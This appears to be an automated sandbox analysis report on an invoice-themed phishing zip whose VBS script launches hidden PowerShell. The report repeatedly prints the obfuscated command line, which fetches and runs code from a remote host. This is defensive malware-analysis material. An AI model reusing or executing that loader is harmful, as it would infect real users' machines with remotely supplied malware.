Source: wscript.exe, 0000000B.00000002.2832180699.00000000038BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s4.histats.com/stats
Source: wscript.exe, 0000000B.00000002.2832180699.00000000038BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2831181995.0000000003416000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2832180699.00000000038B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2831181995.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2831181995.0000000003375000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2833317335.00000000059B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2831181995.000000000340A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s4.histats.com/stats/0.php?4935988&
Source: wscript.exe, 0000000B.00000002.2831181995.00000000033AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s4.histatss$%
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownHTTPS traffic detected: 54.39.128.117:443 -> 192.168.2.7:49705 version: TLS 1.2

System Summary

barindex
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile dump: C:\Users\user\Downloads\faktura_FV2025020660849.zip (copy)Jump to dropped file
Source: faktura_FV2025020660849.zip.crdownload.0.drZip Entry: 2025020665304.vbs
Source: chromecache_68.1.drZip Entry: 2025020665304.vbs
Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($uNteWVUN = $('{7}{5}{6}' -f $('VJJLWexieN'.ToCharArray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^^^|%{[char]($_/4)})-join'') ^^^| ^^^&($uNteWVUN) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($uNteWVUN = $('{7}{5}{6}' -f $('VJJLWexieN'.ToCharArray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^^^|%{[char]($_/4)})-join'') ^^^| ^^^&($uNteWVUN) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir6068_386177336Jump to behavior
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir6068_386177336Jump to behavior
Source: classification engineClassification label: mal96.phis.expl.evad.winHTML@43/18@8/6
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\dd874d12-8b59-4b0d-98a4-3b7b67550140.tmpJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6780:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6728:120:WilError_03
Source: C:\Windows\SysWOW64\unarchiver.exeFile created: C:\Users\user\AppData\Local\Temp\unarchiver.logJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs"
Source: C:\Windows\SysWOW64\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2060,i,3895141347888249468,9556767451129423605,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2104 /prefetch:3
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\faktura_FV2025020660849.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\unarchiver.exe "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\faktura_FV2025020660849.zip"
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg" "C:\Users\user\Downloads\faktura_FV2025020660849.zip"
Source: C:\Windows\SysWOW64\7za.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs"
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($uNteWVUN = $('{7}{5}{6}' -f $('VJJLWexieN'.ToCharArray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^^^|%{[char]($_/4)})-join'') ^^^| ^^^&($uNteWVUN) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $($uNteWVUN = $('{7}{5}{6}' -f $('VJJLWexieN'.ToCharArray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^|%{[char]($_/4)})-join'') ^| ^&($uNteWVUN) "
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2060,i,3895141347888249468,9556767451129423605,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2104 /prefetch:3Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\unarchiver.exe "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\faktura_FV2025020660849.zip"Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg" "C:\Users\user\Downloads\faktura_FV2025020660849.zip"Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($uNteWVUN = $('{7}{5}{6}' -f $('VJJLWexieN'.ToCharArray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^^^|%{[char]($_/4)})-join'') ^^^| ^^^&($uNteWVUN) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $($uNteWVUN = $('{7}{5}{6}' -f $('VJJLWexieN'.ToCharArray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^|%{[char]($_/4)})-join'') ^| ^&($uNteWVUN) "Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\7za.exeSection loaded: 7z.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msxml3.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
